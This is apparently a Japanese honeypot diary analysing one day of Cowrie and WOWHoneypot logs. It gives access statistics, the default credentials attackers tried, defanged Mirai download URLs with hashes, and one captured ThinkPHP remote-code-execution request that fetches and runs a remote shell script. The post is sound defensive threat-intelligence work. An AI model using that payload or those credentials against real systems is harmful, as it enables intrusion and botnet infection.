ハニーポット観察日記(2019/01/18)
はじめに
こんにちは。cute_otterです。
今日からCowrieのログの簡易分析を再開しました。
Cowrie
ハニーポット「Cowrie」で2019/01/18 (金) 00:00~23:59 UTC(運用66日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/18 (金) 00:00~23:59 UTC
- 総アクセス件数 : 312,577 件 (前日比 - 件)
- ログイン試行 : 6,579 件 (前日比 - 件)
- SSHコネクション : 3,340 件 (前日比 - 件)
- Telnetコネクション : 3,518 件 (前日比 - 件)
- ユニークIPアドレス : 413 件 (前日比 - 件)
- アクセス元の国 : 59 件 (前日比 - カ国)
- TTY : 3,374 件 (前日比 - 件)
- スキャンと思われるコネクション : 131 件 (前日比 - 件)
ダッシュボード
ダッシュボードは以下の通りです。
国別のアクセス件数
国別のアクセス件数の変遷は以下の通りです。
続いて、国別のアクセス件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Italy | 174,824 | - | - | - | - |
2. | United States | 76,967 | - | - | - | - |
3. | Netherlands | 21,059 | - | - | - | - |
4. | United Kingdom | 12,929 | - | - | - | - |
5. | Ireland | 8,456 | - | - | - | - |
6. | Singapore | 6,287 | - | - | - | - |
7. | Romania | 2,912 | - | - | - | - |
8. | Russia | 2,450 | - | - | - | - |
9. | Germany | 2,380 | - | - | - | - |
10. | Latvia | 1,037 | - | - | - | - |
11. | Sweden | 596 | - | - | - | - |
12. | China | 531 | - | - | - | - |
13. | Vietnam | 525 | - | - | - | - |
14. | India | 422 | - | - | - | - |
15. | Brazil | 222 | - | - | - | - |
16. | France | 217 | - | - | - | - |
17. | Republic of Korea | 89 | - | - | - | - |
18. | Bangladesh | 73 | - | - | - | - |
19. | Canada | 49 | - | - | - | - |
20. | Colombia | 48 | - | - | - | - |
イタリア
からのアクセスが1~6時に集中していました。- 一つのIPアドレスから174,182件(174,824件中)のアクセスがありました。
アメリカ
からのアクセスは一日を通して安定していました。- 一つのIPアドレスから69,599件(76,967件中)のアクセスがありました。
オランダ
からのアクセスが2時、12時、15~16時、20時に集中していました。- 一つのIPアドレスから20,998件(21,059件中)のアクセスがありました。
国別のユニークIPアドレスの件数
国別のユニークIPアドレスの件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | China | 72 | - | - | - | - |
2. | United States | 52 | - | - | - | - |
3. | Vietnam | 29 | - | - | - | - |
4. | France | 28 | - | - | - | - |
5. | Brazil | 16 | - | - | - | - |
6. | United Kingdom | 16 | - | - | - | - |
7. | Russia | 16 | - | - | - | - |
8. | Germany | 15 | - | - | - | - |
9. | India | 15 | - | - | - | - |
10. | Italy | 12 | - | - | - | - |
11. | Republic of Korea | 11 | - | - | - | - |
12. | Singapore | 9 | - | - | - | - |
13. | Canada | 8 | - | - | - | - |
14. | Netherlands | 8 | - | - | - | - |
15. | Ireland | 8 | - | - | - | - |
16. | Taiwan | 8 | - | - | - | - |
17. | Sweden | 7 | - | - | - | - |
18. | Colombia | 7 | - | - | - | - |
19. | Hong Kong | 6 | - | - | - | - |
20. | Bangladesh | 5 | - | - | - | - |
国別のログイン試行の件数
国別のログイン試行の件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Italy | 1,641 | - | - | - | - |
2. | United Kingdom | 1,526 | - | - | - | - |
3. | Ireland | 1,283 | - | - | - | - |
4. | United States | 827 | - | - | - | - |
5. | Netherlands | 457 | - | - | - | - |
6. | Russia | 177 | - | - | - | - |
7. | Singapore | 144 | - | - | - | - |
8. | Romania | 94 | - | - | - | - |
9. | China | 72 | - | - | - | - |
10. | Germany | 67 | - | - | - | - |
11. | Sweden | 54 | - | - | - | - |
12. | Vietnam | 49 | - | - | - | - |
13. | France | 30 | - | - | - | - |
14. | Latvia | 23 | - | - | - | - |
15. | India | 19 | - | - | - | - |
16. | Brazil | 17 | - | - | - | - |
17. | Republic of Korea | 12 | - | - | - | - |
18. | Bangladesh | 9 | - | - | - | - |
19. | Canada | 9 | - | - | - | - |
20. | Colombia | 7 | - | - | - | - |
ログイン試行で使用されたユーザ名とパスワード
ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。
順位 | ユーザ名 | パスワード | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|---|
1. | admin | admin | 2,975 | - | - | - | - |
2. | root | 88888888 | 556 | - | - | - | DVRを狙ったものと思われる(参照) |
3. | root | GM8182 | 293 | - | - | - | Grain Media製のDVRを狙ったものと思われる(参照) |
4. | guest | 123456 | 281 | - | - | - | - |
5. | admin | admin1 | 276 | - | - | - | - |
6. | support | 1234 | 274 | - | - | - | - |
7. | root | 12345 | 198 | - | - | - | - |
8. | admin | smcadmin | 144 | - | - | - | SMC Networks製のルーターを狙ったものと思われる(参照) |
9. | admin | (空欄) | 142 | - | - | - | - |
10. | admin | ZmqVfoSIP | 137 | - | - | - | - |
11. | admin | 1234 | 131 | - | - | - | - |
12. | root | taZz@23495859 | 72 | - | - | - | - |
13. | root | solokey | 48 | - | - | - | ZKSoftware製の端末を狙ったものと思われる(参照) |
14. | root | anko | 40 | - | - | - | Shenzhen ANKO Tech製のDVRを狙ったものと思われる(参照) |
15. | root | tsgoingon | 37 | - | - | - | - |
16. | root | root123 | 27 | - | - | - | - |
17. | telnetadmin | telnetadmin | 22 | - | - | - | - |
18. | admin | ipcam_rt5350 | 21 | - | - | - | - |
19. | user | user | 21 | - | - | - | - |
20. | root | vizxv | 20 | - | - | - | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
admin/admin
の組み合わせのうち約94%がイギリス
とアイルランド
からのログイン試行の際に使用されていました。イギリス
が1,516件(2,975件中)、アイルランド
が1,273件(2,975件中)でした。
root/88888888
、root/GM8182
、guest/123456
、admin/admin1
、support/1234
の組み合わせがイタリア
からのログイン試行の際に多く使用されていました。root/88888888
は530件(556件中)でした。root/GM8182
は268件(293件中)でした。guest/123456
は266件(281件中)でした。admin/admin1
は265件(276件中)でした。support/1234
は263件(274件中)でした。
ダウンロードされたファイル
ダウンロードされたファイルは以下の通りです。
※VT : VirusTotal
順位 | 備考 | ダウンロード元 | MD5 | 検出率(VT) | 件数 |
---|---|---|---|---|---|
1. | Mirai | hxxp://195[.]231[.]0[.]120:80/AB4g5/Josho[.]x86 | d5f9953e5209ebe670208ff55155fa6e | 20/59 | 1,538 |
2. | Mirai | hxxp://185[.]244[.]25[.]221:80/bins/Yowai[.]x86 | 2fbc81a4d25af7bdd609addbdc3e59aa | 12/57 | 439 |
3. | Mirai | hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 | 4147e375f325878fe3c3962c3d4ac411 | 37/57 | 397 |
4. | Gafgyt or Mirai | hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 | 0f6fa2e22d9de3864e7d60ed6c0cb4b5 | 35/60 | 135 |
5. | Mirai | hxxp://142[.]93[.]24[.]154:80/vb/Amakano[.]x86 | 046f51c1b84a90db7074d66e9b65967f | 27/60 | 61 |
6. | Mirai(ダウンローダー) | hxxp://89[.]46[.]223[.]247/8UsA[.]sh | 3dae78adf9f4a8520afb9ff9d701d3ab | 28/58 | 59 |
7. | Mirai(ダウンローダー) | hxxp://209[.]141[.]46[.]133/bins[.]sh | 5682bddae3a2946670a044e9e5d83e09 | 27/58 | 42 |
8. | Mirai | hxxp://157[.]230[.]29[.]251:80/bins/Solar[.]x86 | b06b3c1bca6b86d2d88e0ab476ae97fc | 25/61 | 42 |
9. | Mirai | hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 | 5992df2c67bb83df6ad5ea01e0af5ec6 | 19/58 | 30 |
10. | Mirai | hxxp://194[.]147[.]35[.]54:80/ankit/os[.]x86 | f3f8482080265f3dc145fe9029038704 | 25/58 | 29 |
11. | Mirai | hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido | 236cc078eb84e9e14f1112a52e74abc9 | 35/59 | 20 |
12. | Mirai | hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 | e68bd8a8712ce1788faa15c9813c00ab | 22/59 | 19 |
13. | Mirai | hxxp://35[.]235[.]102[.]123:80/AB4g5/Josho[.]x86 | 8e4a0a4408c3351e132e56ca32e7c4d5 | 21/58 | 9 |
14. | Mirai(ダウンローダー) | hxxp://45[.]62[.]249[.]171/sensi[.]sh | 1090c808402468f6a03e326870b414d1 | 23/58 | 8 |
15. | Mirai | hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 | e4ae3f23bbdbcb67b52be4616ffe280b | 24/59 | 7 |
16. | Mirai | hxxp://209[.]141[.]43[.]15:80/bins/mirai[.]x86 | 256e4d3c013fe49c6166da2d3ba0c524 | 22/58 | 7 |
17. | Mirai | hxxp://bot[.]sunless[.]network:80/sunless[.]x86 | 06a8ac27ca066c417459186e4b3abf0a | 22/58 | 6 |
18. | Mirai | hxxp://34[.]80[.]139[.]3:80/AB4g5/Josho[.]x86 | 62418c99fa5ece15bc60d59bde27b308 | 19/57 | 5 |
19. | Mirai | hxxp://168[.]235[.]103[.]89:80/bins/kirai[.]x86 | 8136de7bf98ab931951d2394511dd1e6 | 23/56 | 5 |
Mirai
(亜種含む)が多くダウンロードされていました。- 1位の
d5f9953e5209ebe670208ff55155fa6e
は全てイタリア
からのアクセスによるセッション中にダウンロードされていました。 - 2位の
2fbc81a4d25af7bdd609addbdc3e59aa
は全てオランダ
からのアクセスによるセッション中にダウンロードされていました。
国別のダウンロードされたファイル
国別のダウンロードされたファイルは以下の通りです。
イタリア
順位 | 備考 | ダウンロード元 | MD5 | 検出率(VT) | 件数 |
---|---|---|---|---|---|
1. | Mirai | hxxp://195[.]231[.]0[.]120:80/AB4g5/Josho[.]x86 | d5f9953e5209ebe670208ff55155fa6e | 20/59 | 1,538 |
2. | Mirai(ダウンローダー) | hxxp://209[.]141[.]46[.]133/bins[.]sh | 5682bddae3a2946670a044e9e5d83e09 | 27/58 | 41 |
3. | Mirai(ダウンローダー) | hxxp://45[.]62[.]249[.]171/sensi[.]sh | 1090c808402468f6a03e326870b414d1 | 23/58 | 8 |
オランダ
順位 | 備考 | ダウンロード元 | MD5 | 検出率(VT) | 件数 |
---|---|---|---|---|---|
1. | Mirai | hxxp://185[.]244[.]25[.]221:80/bins/Yowai[.]x86 | 2fbc81a4d25af7bdd609addbdc3e59aa | 12/57 | 439 |
2. | Mirai(ダウンローダー) | hxxp://209[.]141[.]46[.]133/bins[.]sh | 5682bddae3a2946670a044e9e5d83e09 | 27/58 | 1 |
Cowrieで取得したログの簡易分析は以上です。
WOWHoneypot
ハニーポット「WOWHoneypot」で2019/01/18 (金) 00:00~23:59 UTC(運用15日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/18 (金) 00:00~23:59 UTC
- 総アクセス件数 : 120 件 (前日比 -955 件)
- ユニークIPアドレス件数 : 57 件 (前日比 +23 件)
- アクセス元の国数 : 17 カ国 (前日比 -1 カ国)
国別のアクセス件数
国別のアクセス件数は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | China | 79 | 1. | 354 | -275 | - |
2. | Brazil | 13 | 6. | 5 | +8 | - |
3. | Seychelles | 9 | 5. | 9 | +-0 | - |
4. | Russia | 3 | 13. | 1 | +2 | - |
5. | United States | 3 | 4. | 12 | -9 | - |
6. | Albania | 2 | - | 0 | +2 | - |
7. | Indonesia | 1 | 17. | 1 | +-0 | - |
8. | Kyrgyzstan | 1 | - | 0 | +1 | - |
9. | Taiwan | 1 | - | 0 | +1 | - |
10. | Philippines | 1 | - | 0 | +1 | - |
11. | Singapore | 1 | - | 0 | +1 | - |
12. | Greece | 1 | - | 0 | +1 | - |
13. | Chile | 1 | - | 0 | +1 | - |
14. | Morocco | 1 | - | 0 | +1 | - |
15. | India | 1 | 12. | 1 | +-0 | - |
16. | Burundi | 1 | - | 0 | +1 | - |
17. | Netherlands | 1 | - | 0 | +1 | - |
- 前日、アクセス件数が300件を超えていた
ベトナム
、香港
からのアクセスはありませんでした。 中国
からのアクセスが前日より約300件減少しました。
アクセス先
アクセス先は以下の通りです。
順位 | 備考 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 |
---|---|---|---|---|---|---|
1. | トップページへのアクセス | GET / HTTP/1.1 | 104 | 2. | 20 | +84 |
2. | Gitのコンフィグファイルの探査 | GET /.git/config HTTP/1.1 | 9 | 7. | 9 | +-0 |
3. | トップページへのアクセス | GET / HTTP/1.0 | 4 | 19. | 5 | -1 |
4. | D-Link製の製品の探査 | GET /HNAP1/ HTTP/1.1 | 1 | - | 0 | +1 |
5. | トップページへのアクセス | POST / HTTP/1.1 | 1 | - | 0 | +1 |
6. | ThinkPHPフレームワークの脆弱性を利用した攻撃(参照) User-AgentはSefa でした。 |
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://167[.]99[.]219[.]142/ex[.]sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1 | 1 | - | 0 | +1 |
- 2日ぶりにThinkPHPフレームワークの脆弱性を利用した攻撃を観測しました。
- 2日前に観測した攻撃と今回の攻撃の送信元IPアドレスが同一でした。
- WebShellの探査やphpMyAdminの探査は1件もありませんでした。
WOWHoneypotで取得したログの簡易分析は以上です。